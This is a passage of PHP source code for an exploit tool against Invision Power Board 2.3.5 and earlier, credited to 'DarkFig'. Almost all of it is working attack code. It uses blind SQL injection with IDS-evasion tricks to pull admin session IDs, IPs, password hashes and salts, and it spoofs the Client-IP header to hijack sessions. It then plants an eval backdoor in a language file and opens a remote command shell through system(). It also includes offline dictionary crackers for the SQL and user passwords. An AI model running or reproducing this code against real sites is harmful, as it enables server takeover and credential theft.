$this->mhead();
|
|
|
|
# Gimme your args
|
|
$this->p_attack = $this->get_p('attack', true);
|
|
$this->p_prox = $this->get_p('proxhost');
|
|
$this->p_proxa = $this->get_p('proxauth');
|
|
|
|
$this->init_global();
|
|
|
|
# Proxy params
|
|
if( $this->p_prox )
|
|
{
|
|
$this->web->proxy($this->p_prox);
|
|
|
|
if( $this->p_proxa )
|
|
$this->web->proxyauth($this->p_proxa);
|
|
}
|
|
|
|
# Where do we go ?
|
|
switch( $this->p_attack )
|
|
{
|
|
case 1: $this->code_exec(); break;
|
|
case 2: $this->bf_sql_pwd(); break;
|
|
case 3: $this->bf_usr_pwd(); break;
|
|
default: $this->usage();
|
|
}
|
|
|
|
return;
|
|
}
|
|
|
|
function code_exec($loop=1)
|
|
{
|
|
# First loop
|
|
if( $loop == 1 )
|
|
{
|
|
$this->set_sql_param();
|
|
$this->set_sql_focus();
|
|
|
|
$this->p_acp = $this->get_p('acp');
|
|
|
|
# ACP path
|
|
if( !$this->p_acp )
|
|
{
|
|
# If the user changed the ACP directory, we can
|
|
# find it (if the "Remove ACP Link" option was not
|
|
# applied) by log in as an Admin, and then click
|
|
# on "Admin CP". This can be done with a user
|
|
# but I didn't implemented that ;)
|
|
$this->msg('Using default ACP path: admin', 1);
|
|
$this->p_acp = 'admin';
|
|
}
|
|
else
|
|
$this->msg('Using ACP path "'.$this->p_acp.'"', 1);
|
|
|
|
# Init client headers:
|
|
# Only if we have the same IP as the targeted user (not admin),
|
|
# it resets session datas, so we try to spoof our
|
|
# IP as a random one in order to keep user's session datas while
|
|
# we bruteforce SQL fields.
|
|
$this->bypass_matches();
|
|
|
|
# Remove expired sessions ( time() - 60*60*2 = > 2 hours )
|
|
$this->web->get($this->p_url.$this->p_acp.'/index.php?');
|
|
$this->msg('Removed all out of date admin sessions', 1);
|
|
|
|
# Cookie prefix
|
|
$this->get_cprefix();
|
|
}
|
|
|
|
# Admin session ?
|
|
$this->msg('Trying to find an admin session id', 0);
|
|
|
|
# Got one :]
|
|
if( $this->get_admin_sess() )
|
|
{
|
|
$this->s_admin = true;
|
|
$this->s_sess = $this->data['a_sess_id'];
|
|
$this->a_url = $this->p_url.$this->p_acp.'/index.php?adsess='.$this->s_sess;
|
|
}
|
|
|
|
# Nothing special
|
|
else
|
|
{
|
|
$this->s_admin = false;
|
|
$this->msg('No admin session id found', -1);
|
|
}
|
|
|
|
# User session ?
|
|
if( !$this->s_sess )
|
|
{
|
|
$this->msg('Trying to find a user session id', 0);
|
|
|
|
# Yep
|
|
if( $this->get_user_sess() )
|
|
$this->s_sess = $this->data['u_sess_id'];
|
|
|
|
# F0ck
|
|
else
|
|
{
|
|
$this->msg('No user session id found', -1);
|
|
$this->msg('Admin session > 2 hours or user logged out', 0);
|
|
$this->msg('Keeping trying until the user connects', 0);
|
|
$this->msg('Entering loop #'.$loop.' ...', 0);
|
|
$this->code_exec(++$loop);
|
|
}
|
|
}
|
|
|
|
$this->msg('Getting security options', 0);
|
|
|
|
# Security options
|
|
$this->get_sec_options();
|
|
|
|
# IP filter ?
|
|
if( $this->conf['ip'] === '1' )
|
|
{
|
|
$this->s_bypass = true;
|
|
|
|
$this->msg('IP filter option is turned on', 0);
|
|
|
|
# Spoofing protection ?
|
|
if( !$this->conf['xforward'] )
|
|
{
|
|
# Assuming our IP isn't the same etc..
|
|
$this->msg('Can\'t bypass the IP filter', -1);
|
|
exit(1);
|
|
}
|
|
|
|
# X-Forwarded-For / Client-IP /
|
|
# Proxy-User / X-Cluster-Client-IP
|
|
else
|
|
{
|
|
$this->msg('Cool, we can spoof our IP (Client-IP)', 1);
|
|
|
|
if( $this->s_admin )
|
|
{
|
|
$this->msg('Trying to find admin\'s last IP', 0);
|
|
|
|
# Admin IP found
|
|
$this->get_admin_ip();
|
|
$this->s_ip = $this->data['a_ip_addr'];
|
|
}
|
|
else
|
|
{
|
|
$this->s_admin = false;
|
|
$this->msg('Trying to find user\'s last used IP', 0);
|
|
|
|
# User IP found
|
|
$this->get_user_ip();
|
|
$this->s_ip = $this->data['u_ip_addr'];
|
|
}
|
|
|
|
# Nothing found
|
|
if( !$this->s_ip )
|
|
{
|
|
# Ahah (:
|
|
$this->msg('No IP found for this user', -1);
|
|
$this->give_hope();
|
|
}
|
|
|
|
# Got one !
|
|
else
|
|
$this->msg('Ok, using IP '.$this->s_ip, 1);
|
|
}
|
|
}
|
|
|
|
# User-Agent filter ?
|
|
if( $this->conf['browser'] === '1' && !$this->s_admin )
|
|
{
|
|
$this->s_bypass = true;
|
|
|
|
$this->msg('Trying to find a valid user-agent', 0);
|
|
|
|
# Good
|
|
if( $this->get_user_agent() )
|
|
{
|
|
$this->msg('Ok, using user-agent '.substr($this->data['u_agent'], 0, 10).'...', 1);
|
|
$this->s_agent = $this->data['u_agent'];
|
|
}
|
|
|
|
# WTF :!
|
|
else
|
|
{
|
|
$this->msg('No user-agent found for this user', -1);
|
|
$this->msg('Maybe the browser didn\'t send this header', 0);
|
|
$this->s_agent = '';
|
|
}
|
|
|
|
}
|
|
|
|
# Cool !?
|
|
if( !$this->s_bypass )
|
|
$this->msg('Cool, nothing to bypass', 1);
|
|
|
|
$this->msg('Trying to log in', 0);
|
|
|
|
# Owned =]
|
|
if( $this->is_logged() )
|
|
{
|
|
# PHP code
|
|
if( $this->s_admin )
|
|
{
|
|
$this->msg('Logged in with an admin session', 1);
|
|
$this->exec_code();
|
|
}
|
|
|
|
# Normal user ?
|
|
else
|
|
{
|
|
$this->msg('Logged in with a user session', 1);
|
|
$this->msg('You can log in using the cookie session_id', 1);
|
|
|
|
if( $this->s_ip !== $this->def_ip )
|
|
$this->msg('Set the Client-IP header to: '.$this->s_ip, 1);
|
|
|
|
if( $this->s_agent )
|
|
$this->msg('Set the User-Agent header to: '.$this->s_agent, 1);
|
|
|
|
exit(0);
|
|
}
|
|
}
|
|
else
|
|
{
|
|
# Even if the admin logged out .. the admin session
|
|
# is still valid ;)
|
|
$this->msg('Can\'t log in, the session has expired ?!', -1);
|
|
$this->give_hope();
|
|
}
|
|
|
|
return;
|
|
}
|
|
|
|
function bf_sql_pwd()
|
|
{
|
|
$this->p_ip = $this->get_p('ip', true);
|
|
$this->p_dict = $this->get_p('dict', true);
|
|
|
|
$this->p_sql_u = $this->get_p('sqlusr');
|
|
|
|
$this->p_url = $this->get_p('url');
|
|
$this->p_uname = $this->get_p('uname');
|
|
$this->p_pwd = $this->get_p('pwd');
|
|
// or
|
|
$this->p_uid = $this->get_p('uid');
|
|
$this->p_hash = $this->get_p('passhash');
|
|
$this->p_shold = $this->get_p('stronghold');
|
|
|
|
if( $this->p_uname && $this->p_pwd && $this->p_url )
|
|
{
|
|
$this->get_cprefix();
|
|
|
|
$this->msg('Trying to get some cookies', 0);
|
|
|
|
$g_dat = 'index.php?act=Login&CODE=01&CookieDate=1';
|
|
$p_dat = 'UserName='.$this->p_uname.'&PassWord='.$this->p_pwd.'&x=0&y=0';
|
|
|
|
$this->web->post($this->p_url.$g_dat, $p_dat);
|
|
|
|
$this->p_uid = $this->web->cookie[$this->s_cprefix.'member_id'];
|
|
$this->p_hash = $this->web->cookie[$this->s_cprefix.'pass_hash'];
|
|
$this->p_shold = $this->web->cookie[$this->s_cprefix.'ipb_stronghold'];
|
|
}
|
|
elseif( !$this->p_uid || !$this->p_hash || !$this->p_shold )
|
|
$this->usage();
|
|
|
|
if( !$this->p_uid || !$this->p_hash || !$this->p_shold )
|
|
{
|
|
$this->msg('Can\'t get cookies', -1);
|
|
$this->msg('You should try with other parameters', -1);
|
|
exit(1);
|
|
}
|
|
|
|
$this->msg('Ok, using cookies:', 1);
|
|
|
|
$this->msg('member_id='.$this->p_uid, 1);
|
|
$this->msg('pass_hash='.$this->p_hash, 1);
|
|
$this->msg('ipb_stronghold='.$this->p_shold, 1);
|
|
|
|
if( !$this->p_sql_u )
|
|
{
|
|
$this->set_sql_param();
|
|
|
|
$this->msg('Trying to get the current sql user', 0);
|
|
|
|
if( !$this->get_sql_user() )
|
|
{
|
|
$this->msg('Can\'t get the sql user', -1);
|
|
$this->msg('If you know the sql user, use -sqlusr', -1);
|
|
exit(1);
|
|
}
|
|
else
|
|
$this->p_sql_u = $this->data['sql_user'];
|
|
}
|
|
|
|
$this->msg('Ok, using sql user '.$this->p_sql_u, 1);
|
|
|
|
$dico_c = file($this->p_dict);
|
|
$ip_a = explode('.', $this->p_ip);
|
|
|
|
$this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);
|
|
$this->msg('You should take a drink ...', 0);
|
|
|
|
foreach( $dico_c as $line )
|
|
{
|
|
$md5 = md5(trim($line).$this->p_sql_u);
|
|
$md5 = md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).$md5;
|
|
$md5 = md5($md5);
|
|
|
|
if( $this->p_shold === $md5 )
|
|
{
|
|
$this->msg('Found something cool =]', 1);
|
|
$this->msg('SQL password: '.$line, 1);
|
|
exit(1);
|
|
}
|
|
|
|
}
|
|
|
|
$this->msg('End of the wordlist, password not found', -1);
|
|
|
|
return;
|
|
}
|
|
|
|
function bf_usr_pwd()
|
|
{
|
|
$this->p_dict = $this->get_p('dict', true);
|
|
|
|
$this->p_hash = $this->get_p('passhash');
|
|
$this->p_salt = $this->get_p('salt');
|
|
|
|
if( !$this->p_hash || !$this->p_salt )
|
|
{
|
|
$this->set_sql_param();
|
|
$this->set_sql_focus();
|
|
}
|
|
|
|
if( !$this->p_hash )
|
|
{
|
|
$this->msg('Trying to get the password hash', 0);
|
|
|
|
if( !$this->get_pass_hash() )
|
|
{
|
|
$this->msg('Can\'t get the password hash', -1);
|
|
exit(1);
|
|
}
|
|
else
|
|
$this->p_hash = $this->data['pass_hash'];
|
|
}
|
|
|
|
$this->msg('Ok, using hash '.$this->p_hash, 1);
|
|
|
|
if( !$this->p_salt )
|
|
{
|
|
$this->msg('Trying to get the password salt', 0);
|
|
|
|
if( !$this->get_pass_salt() )
|
|
{
|
|
$this->msg('Can\'t get the password salt', -1);
|
|
exit(1);
|
|
}
|
|
else
|
|
$this->p_salt = $this->data['pass_salt'];
|
|
}
|
|
|
|
$this->msg('Ok, using salt '.$this->p_salt, 1);
|
|
|
|
$dico_c = file($this->p_dict);
|
|
|
|
$this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);
|
|
$this->msg('You should take a drink ...', 0);
|
|
|
|
foreach( $dico_c as $line )
|
|
{
|
|
if( $this->p_hash === md5(md5($this->p_salt).md5(trim($line))) )
|
|
{
|
|
$this->msg('Found something cool =]', 1);
|
|
$this->msg('User password: '.$line, 1);
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
$this->msg('End of the wordlist, password not found', -1);
|
|
|
|
return;
|
|
}
|
|
|
|
function set_sql_param()
|
|
{
|
|
$this->p_url = $this->get_p('url', true);
|
|
$this->p_pre = $this->get_p('prefix');
|
|
|
|
# Table prefix
|
|
if( !$this->p_pre )
|
|
{
|
|
# Default table prefix if not precised
|
|
$this->msg('Using default table prefix: ibf_', 1);
|
|
$this->p_pre = 'ibf_';
|
|
}
|
|
else
|
|
$this->msg('Using table prefix '.$this->p_pre, 1);
|
|
|
|
}
|
|
|
|
function set_sql_focus()
|
|
{
|
|
$this->p_uname = $this->get_p('uname');
|
|
$this->p_uid = $this->get_p('uid');
|
|
|
|
if( $this->p_uname )
|
|
$this->msg('Using targeted username '.$this->p_uname, 1);
|
|
|
|
elseif( $this->p_uid )
|
|
$this->msg('Using targeted user id '.$this->p_uid, 1);
|
|
|
|
# Target
|
|
if( !($this->p_uname || $this->p_uid) )
|
|
{
|
|
# Default uid if not precised
|
|
$this->msg('Using default user id: 1', 1);
|
|
$this->p_uid = 1;
|
|
}
|
|
|
|
# Focus on ?
|
|
if( $this->p_uname )
|
|
$this->t_on = 'members_l_username=\''.addslashes($this->p_uname).'\'';
|
|
|
|
else
|
|
$this->t_on = 'id='.(int)$this->p_uid;
|
|
|
|
return;
|
|
}
|
|
|
|
function exec_code()
|
|
{
|
|
$this->write_code();
|
|
|
|
while( $this->cmd_prompt() )
|
|
{
|
|
$this->web->addheader('My-Code', $this->cmd);
|
|
$this->web->get($this->p_url);
|
|
|
|
print "\n".$this->get_answer();
|
|
}
|
|
|
|
exit(0);
|
|
}
|
|
|
|
function get_answer()
|
|
{
|
|
$res_a = explode($this->res_sep, $this->web->getcontent());
|
|
|
|
if( !$res_a[1] )
|
|
return 'No result to retrieve';
|
|
|
|
else
|
|
return $res_a[1];
|
|
}
|
|
|
|
function cmd_prompt()
|
|
{
|
|
$this->cmd = $this->msg('root@ipb: ', 1, 1, 0, true);
|
|
|
|
if( !ereg('^(quit|exit)$', $this->cmd) )
|
|
{
|
|
$this->cmd = base64_encode($this->cmd);
|
|
$this->cmd = str_replace('%CMD%', $this->cmd, $this->php_send);
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
else
|
|
return FALSE;
|
|
}
|
|
|
|
function write_code()
|
|
{
|
|
# Gimme the language ID
|
|
$this->get_def_lang();
|
|
|
|
# Current lang settings
|
|
$p_dat =
|
|
'code=edit2&act=lang&id='.$this->g_lid.'§ion'.
|
|
'=lookandfeel&lang_file=lang_boards.php';
|
|
|
|
$this->web->post($this->a_url, $p_dat);
|
|
|
|
# We collect each variable name / value
|
|
if( preg_match_all($this->reg_lvar, $this->web->getcontent(), $l_vars) )
|
|
{
|
|
# POST data
|
|
$p_dat =
|
|
'code=doedit&act=lang&id='.$this->g_lid.
|
|
'&lang_file=lang_boards.php§ion=lo'.
|
|
'okandfeel&';
|
|
|
|
# &Name=Value
|
|
for( $i=0; $i<count($l_vars[0]); $i++ )
|
|
{
|
|
$p_dat .=
|
|
'&XX_'.$l_vars[1][$i].'='.urlencode($l_vars[2][$i]);
|
|
|
|
# We write our PHP code in the first variable
|
|
if( $i == 0 )
|
|
$p_dat .= $this->php_write;
|
|
}
|
|
|
|
# Go on
|
|
$this->web->post($this->a_url, $p_dat);
|
|
|
|
$this->msg('PHP code written', 1);
|
|
}
|
|
else
|
|
{
|
|
# WTF :!
|
|
$this->msg('Can\'t find block variables', 0);
|
|
exit(1);
|
|
}
|
|
|
|
return;
|
|
}
|
|
|
|
function get_def_lang()
|
|
{
|
|
$this->msg('Trying to get the set language id', 0);
|
|
|
|
$this->web->get($this->a_url.'§ion=lookandfeel&act=lang');
|
|
|
|
if( preg_match($this->reg_lang, $this->web->getcontent(), $lids) )
|
|
{
|
|
$this->g_lid = $lids[1];
|
|
$this->msg('Using language id '.$this->g_lid, 1);
|
|
}
|
|
else
|
|
{
|
|
$this->msg('Can\'t get the default language id', -1);
|
|
exit(1);
|
|
}
|
|
|
|
return;
|
|
}
|
|
|
|
function is_logged()
|
|
{
|
|
$this->bypass_matches();
|
|
|
|
# User session ok ?
|
|
if( !$this->s_admin )
|
|
{
|
|
$match = 'act=Login&CODE=03';
|
|
$this->web->addcookie($this->s_cprefix.'session_id', $this->s_sess);
|
|
$this->web->get($this->p_url);
|
|
}
|
|
|
|
# Admin session ok ?
|
|
else
|
|
{
|
|
$match = '§ion=';
|
|
$this->web->get($this->a_url);
|
|
}
|
|
|
|
if( preg_match("/$match/i", $this->web->getcontent()) )
|
|
return true;
|
|
|
|
else
|
|
return false;
|
|
}
|
|
|
|
function bypass_matches()
|
|
{
|
|
# match_browser
|
|
$this->web->agent($this->s_agent);
|
|
|
|
# match_ipaddress
|
|
$this->web->addheader('Client-IP', $this->s_ip);
|
|
|
|
return;
|
|
}
|
|
|
|
function get_cprefix()
|
|
{
|
|
$this->msg('Trying to get the cookie prefix', 0);
|
|
|
|
# Set-Cookie: session_id=...; path=/
|
|
$this->web->get($this->p_url);
|
|
|
|
$this->s_cprefix = '';
|
|
|
|
if( $this->web->cookie )
|
|
{
|
|
foreach( $this->web->cookie as $name => $value)
|
|
{
|
|
if( preg_match($this->reg_cpre, $name, $cmatches) )
|
|
{
|
|
$this->s_cprefix = $cmatches[1];
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
if( !$this->s_cprefix )
|
|
$this->msg('No cookie prefix set', 1);
|
|
|
|
else
|
|
$this->msg('Using cookie prefix '.$this->s_cprefix, 1);
|
|
|
|
return;
|
|
}
|
|
|
|
function get_sec_options()
|
|
{
|
|
# If no value, take the default one
|
|
$this->get_conf('t.conf_value');
|
|
$this->get_conf('t.conf_default');
|
|
|
|
return;
|
|
}
|
|
|
|
function get_conf($field)
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_table = 'conf_settings';
|
|
$this->t_field = $field;
|
|
$this->t_char = $this->chr_num;
|
|
|
|
$this->t_add_0 = "AND t.conf_key='match_browser'";
|
|
|
|
if( $this->conf['browser'] === '' )
|
|
$this->conf['browser'] = $this->bf_inj();
|
|
|
|
$this->t_add_0 = "AND t.conf_key='match_ipaddress'";
|
|
|
|
if( $this->conf['ip'] === '' )
|
|
$this->conf['ip'] = $this->bf_inj();
|
|
|
|
$this->t_add_0 = "AND t.conf_key='xforward_matching'";
|
|
|
|
if( $this->conf['xforward'] === '' )
|
|
$this->conf['xforward'] = $this->bf_inj();
|
|
|
|
return;
|
|
}
|
|
|
|
function get_login_key()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'login_key';
|
|
$this->t_table = 'members';
|
|
$this->t_field = 't.member_login_key';
|
|
$this->t_join = 't.id=m.id';
|
|
$this->t_char = $this->chr_md5;
|
|
$this->data['login_key'] = $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function get_sql_user()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'user()';
|
|
$this->t_table = 'members';
|
|
$this->t_field = 'user()';
|
|
$this->t_char = $this->chr_all;
|
|
$this->t_end = '@';
|
|
$this->data['sql_user'] = $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function get_pass_hash()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'pass_hash';
|
|
$this->t_table = 'members_converge';
|
|
$this->t_field = 't.converge_pass_hash';
|
|
$this->t_join = 't.converge_email=m.email';
|
|
$this->t_char = $this->chr_md5;
|
|
$this->data['pass_hash'] = $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function get_pass_salt()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'pass_salt';
|
|
$this->t_table = 'members_converge';
|
|
$this->t_field = 't.converge_pass_salt';
|
|
$this->t_join = 't.converge_email=m.email';
|
|
$this->t_char = $this->chr_all;
|
|
$this->data['pass_salt'] = $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function get_admin_sess()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'admin_sid';
|
|
$this->t_table = 'admin_sessions';
|
|
$this->t_field = 't.session_id';
|
|
$this->t_join = 't.session_member_id=m.id';
|
|
$this->t_sel = 't.session_log_in_time';
|
|
$this->t_char = $this->chr_md5;
|
|
$this->data['a_sess_id'] = $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function get_admin_ip()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'admin_ip';
|
|
$this->t_table = 'admin_sessions';
|
|
$this->t_field = 't.session_ip_address';
|
|
$this->t_join = 't.session_member_id=m.id';
|
|
$this->t_sel = 't.session_log_in_time';
|
|
$this->t_char = $this->chr_ip;
|
|
$this->data['a_ip_addr'] = $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function get_admin_pwd()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'admin_pwd';
|
|
$this->t_table = 'admin_login_logs';
|
|
$this->t_field = 't.admin_post_details';
|
|
$this->t_join = 't.admin_username=m.members_l_username';
|
|
$this->t_sel = 't.admin_id';
|
|
$this->t_end = '"';
|
|
$this->t_bchar = -4; # ";}}
|
|
$this->t_char = $this->chr_all;
|
|
$this->data['a_pwd_like']= $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function get_user_sess()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'user_sid';
|
|
$this->t_table = 'sessions';
|
|
$this->t_field = 't.id';
|
|
$this->t_join = 't.member_id=m.id';
|
|
$this->t_sel = 't.running_time';
|
|
$this->t_char = $this->chr_md5;
|
|
$this->data['u_sess_id'] = $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function get_user_ip()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'user_ip';
|
|
$this->t_table = 'sessions';
|
|
$this->t_field = 't.ip_address';
|
|
$this->t_join = 't.member_id=m.id';
|
|
$this->t_sel = 't.running_time';
|
|
$this->t_char = $this->chr_ip;
|
|
$this->data['u_ip_addr'] = $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function get_user_agent()
|
|
{
|
|
$this->init_sql();
|
|
|
|
$this->t_key = 'user_agent';
|
|
$this->t_table = 'sessions';
|
|
$this->t_field = 't.browser';
|
|
$this->t_join = 't.member_id=m.id';
|
|
$this->t_sel = 't.running_time';
|
|
$this->t_char = $this->chr_all;
|
|
$this->data['u_agent'] = $this->bf_inj();
|
|
|
|
return $this->key_val;
|
|
}
|
|
|
|
function init_sql()
|
|
{
|
|
# SQL Injection params
|
|
$this->t_end = null;
|
|
$this->t_add_0 = '';
|
|
$this->t_add_1 = '';
|
|
$this->t_sel = '1';
|
|
$this->t_bchar = 0;
|
|
$this->t_join = '';
|
|
$this->t_key = '';
|
|
$this->t_add_1 = 'ORDER BY id DESC LIMIT 1';
|
|
|
|
return;
|
|
}
|
|
|
|
function init_global()
|
|
{
|
|
# Charsets
|
|
$this->chr_spe = str_split(' :/;*(-.!,?§*µù%$£^¨=+})°]à ç^_\\`è|[\'{#é~&²"@');
|
|
$this->chr_num = range(0, 9);
|
|
$this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') );
|
|
$this->chr_ip = array_merge( $this->chr_num, array('.') );
|
|
$this->chr_all = array_merge( $this->chr_num, range('a', 'z') );
|
|
$this->chr_all = array_merge( range('A', 'Z'), $this->chr_all, $this->chr_spe );
|
|
|
|
# SQL Injection
|
|
$this->def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%';
|
|
|
|
# IDS Evasion via %0D
|
|
$this->def_inj = "' OR 1=\"'\" U%0DNION %rep_req% OR 1=\"'\" %rep_add% #";
|
|
|
|
# Results
|
|
$this->data = array();
|
|
$this->conf = array('ip' => '', 'browser' => '', 'xforward' => '');
|
|
|
|
# Misc
|
|
$this->stat = array(-1 => '-', 0 => '/', 1 => '+');
|
|
$this->s_bypass = false;
|
|
$this->res_sep = md5(rand());
|
|
$this->def_ip = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255);
|
|
|
|
# PHP Code
|
|
$this->php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}';
|
|
$this->php_send = "print('$this->res_sep');@system(base64_decode('%CMD%'));";
|
|
$this->php_send .= "print('$this->res_sep');exit(0);";
|
|
|
|
# Regex
|
|
$this->reg_lang = '#</span></td>[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i';
|
|
$this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)</textarea></td>#i";
|
|
$this->reg_cpre = '#^(.*)session_id$#';
|
|
# $this->reg_acp = '#<a href="(.*)"[\x20]+target="_blank"#i';
|
|
|
|
# Default client headers
|
|
$this->s_agent = 'Mozilla Firefox';
|
|
$this->s_ip = $this->def_ip;
|
|
|
|
return;
|
|
}
|
|
|
|
function bf_inj()
|
|
{
|
|
$this->sub_chr = $this->t_bchar;
|
|
$this->key_val = '';
|
|
|
|
if( !empty($this->t_key) )
|
|
$this->msg('', 0);
|
|
|
|
while( true )
|
|
{
|
|
if( $this->t_bchar < 0 )
|
|
$this->sub_chr--;
|
|
|
|
else
|
|
$this->sub_chr++;
|
|
|
|
# 0-9a-f
|
|
for( $j=0;$j<=count($this->t_char);$j++ )
|
|
{
|
|
# That one ?
|
|
$chr = $this->t_char[$j];
|
|
|
|
# Latest char ?
|
|
if( $j === count($this->t_char) )
|
|
$chr = $this->t_end;
|
|
|
|
# Ascii num
|
|
$asc = ord($chr);
|
|
|
|
# Screen bug
|
|
if( !empty($this->t_key) )
|
|
{
|
|
$msg = $this->t_key.'='.$this->key_val;
|
|
$msg .= ($chr === $this->t_end ? "\x20" : $chr);
|
|
|
|
$this->msg($msg, 0, 1, 1);
|
|
}
|
|
|
|
# Focus on the target ?
|
|
if( !empty($this->t_join) )
|
|
{
|
|
$inj =
|
|
'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
|
|
' t, '.$this->p_pre.'members m WH%0DERE '.$this->t_join.
|
|
' AND m.'.$this->t_on.' AND ASC%0DII(SUBS%0DTR('.$this->t_field.
|
|
','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0;
|
|
}
|
|
else
|
|
{
|
|
$inj =
|
|
'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
|
|
' t WH%0DERE ASC%0DII(SUB%0DSTR('.$this->t_field.','.$this->sub_chr.
|
|
',1))='.$asc.' '.$this->t_add_0;
|
|
}
|
|
|
|
# SQL Injection via rawurldecode()
|
|
$inj = str_replace('%rep_req%', $inj, $this->def_inj);
|
|
$inj = str_replace('%rep_add%', $this->t_add_1, $inj);
|
|
$inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj);
|
|
|
|
# Params
|
|
$inj = str_replace('%rep_inj%', $inj, $this->def_param);
|
|
$inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj);
|
|
|
|
$this->web->get($this->p_url.$inj);
|
|
|
|
# Ok !?
|
|
if( !strstr($this->web->getcontent(), 'notfound') )
|
|
{
|
|
if( $chr !== $this->t_end )
|
|
{
|
|
$this->key_val .= $chr;
|
|
break;
|
|
}
|
|
}
|
|
|
|
# End
|
|
if( $chr === $this->t_end )
|
|
{
|
|
# Reverse
|
|
if( $this->t_bchar < 0 )
|
|
$this->key_val = strrev($this->key_val);
|
|
|
|
if( !empty($this->t_key) )
|
|
$this->msg($this->t_key.'='.$this->key_val, 1, 1, 1);
|
|
|
|
return $this->key_val;
|
|
}
|
|
}
|
|
}
|
|
|
|
}
|
|
|
|
function get_p($p, $exit=false)
|
|
{
|
|
global $argv;
|
|
|
|
foreach( $argv as $key => $value )
|
|
{
|
|
if( $value === '-'.$p )
|
|
{
|
|
if( isset($argv[$key+1]) && !empty($argv[$key+1]) )
|
|
{
|
|
return $argv[$key+1];
|
|
}
|
|
else
|
|
{
|
|
if( $exit )
|
|
$this->usage();
|
|
|
|
return true;
|
|
}
|
|
}
|
|
}
|
|
|
|
if( $exit )
|
|
$this->usage();
|
|
|
|
return false;
|
|
}
|
|
|
|
function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false)
|
|
{
|
|
if( $ndel ) $type = "\r";
|
|
else $type = "\n";
|
|
|
|
# wtf (:
|
|
print
|
|
(
|
|
$type.str_repeat("\x20", $nspace).
|
|
$this->stat[$nstatus]."\x20".$msg
|
|
);
|
|
|
|
if( $ask )
|
|
return trim(fgets(STDIN));
|
|
}
|
|
|
|
function give_hope()
|
|
{
|
|
$this->msg('You should try with another user or try another time', -1);
|
|
|
|
exit(1);
|
|
}
|
|
|
|
function mhead()
|
|
{
|
|
# Advisory: http://acid-root.new.fr/?0:18
|
|
|
|
print "\n Invision Power Board <= 2.3.5 Multiple Vulnerabilities";
|
|
print "\n ------------------------------------------------------";
|
|
print "\n\n About:";
|
|
print "\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
|
|
print "\n http://acid-root.new.fr/";
|
|
print "\n #acidroot@irc.worldnet.net";
|
|
print "\n\n\n Attack(s):\n";
|
|
|
|
return;
|
|
}
|
|
|
|
function usage()
|
|
{
|
|
|
|
print "\n -attack <int_choice> <params> [options]\n\n";
|
|
print " 1 - PHP code execution\n\n";
|
|
print " -url IPB url with ending slash\n\n";
|
|
print " -uname targeted username\n";
|
|
print " -uid OR the targeted user id (def: 1)\n\n";
|
|
print " -prefix sql table prefix (def: ibf_)\n";
|
|
print " -acp admin control panel path (def: admin)\n\n\n";
|
|
print " 2 - Insecure SQL password usage\n\n";
|
|
print " -ip your current IP\n";
|
|
print " -dict a wordlist file\n\n";
|
|
print " -url IPB url with ending slash\n";
|
|
print " -uname a valid member username\n";
|
|
print " -pwd the associated password\n\n";
|
|
print " -uid OR the targeted member id\n";
|
|
print " -passhash the passhash cookie value\n";
|
|
print " -stronghold the stronghold cookie value\n\n";
|
|
print " -sqlusr you can precise the sql user\n";
|
|
print " -prefix sql table prefix (def: ibf_)\n\n\n";
|
|
print " 3 - Password bruteforcer\n\n";
|
|
print " -dict a wordlist file\n\n";
|
|
print " -url IPB url with ending slash\n";
|
|
print " -uname targeted username\n";
|
|
print " -uid OR the targeted user id (def: 1)\n";
|
|
print " -prefix sql table prefix (def: ibf_)\n\n";
|
|
print " -passhash OR the passhash value\n";
|
|
print " -salt the salt value\n\n\n";
|
|
print " Optional: \n\n";
|
|
print " -proxhost <ip> if you wanna use a proxy\n";
|
|
print " -proxauth <usr:pwd> proxy with authentication\n";
|
|
|
|
exit(1);
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
/*
|
|
*
|
|
* Copyright (C) darkfig
|
|
*
|
|
* This program is free software; you can redistribute it and/or
|
|
* modify it under the terms of the GNU General Public License
|
|
* as published by the Free Software Foundation; either version 2
|
|
* of the License, or (at your option) any later version.
|
|
*
|
|
